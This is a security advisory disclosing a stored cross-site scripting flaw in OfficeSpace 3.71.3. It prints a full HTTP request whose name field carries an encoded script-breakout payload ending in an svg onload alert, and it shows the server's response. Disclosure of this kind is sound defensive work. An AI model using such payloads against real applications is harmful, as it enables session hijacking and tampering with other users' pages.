#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  OfficeSpace [1]
# Vendor:   OfficeSpace Software Inc.
# CSNC ID:  CSNC-2018-017
# Subject:  Stored Cross-Site Scripting
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Stephan Sekula
# Date:     18.04.2018
#
#############################################################

Introduction:
-------------

The smarter, easier way to manage your space. [1]

Compass Security discovered a security flaw in OfficeSpace, which allows
injecting client-side code into the application.

Affected:
---------

Vulnerable:
 * Version 3.71.3

Technical Description
---------------------

Users are able to edit, for example, their names via the software.
Manipulating the corresponding parameter in the request leads to the
submitted value being included unescaped in the resulting response.

Note that other parameters, such as floor[label] when editing a floor
name, are also vulnerable.
Request:

POST /users/30-csnc-csnc-placement-bottom-svg-onload-alert-1 HTTP/1.1
Host: [CUT].officespacesoftware.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _huddle_session=[CUT]
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 258

utf8=%E2%9C%93&_method=patch&authenticity_token=[CUT]%5B
email%5D=stephan.sekula%40compass-security.com&user%5Brole%5D=admin&
user%5Bfirst_name%5D=CSNC&user%5Blast_name%5D=CSNC%22%2Cplacement%3A%27bottom
%27%7D%29%3B%24%28%27%3Csvg+onload%3Dalert%281%29%3E%27%29%3B%7D%29%3B%3C
%2Fscript%3E%3C%21--&user%5Binitials%5D=CSNC&user%5Btime_zone%5D=UTC&
commit=Save+User
[CUT]

Response:

HTTP/1.1 200 OK
Date: Wed, 18 Apr 2018 05:02:17 GMT
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0, private, must-revalidate
Strict-Transport-Security: max-age=15552000; includeSubDomains
Set-Cookie: _huddle_session=[CUT]; path=/; secure; HttpOnly
Vary: Accept-Encoding
Content-Length: 19512
Connection: close

OfficeSpace Software
[CUT]
[CUT]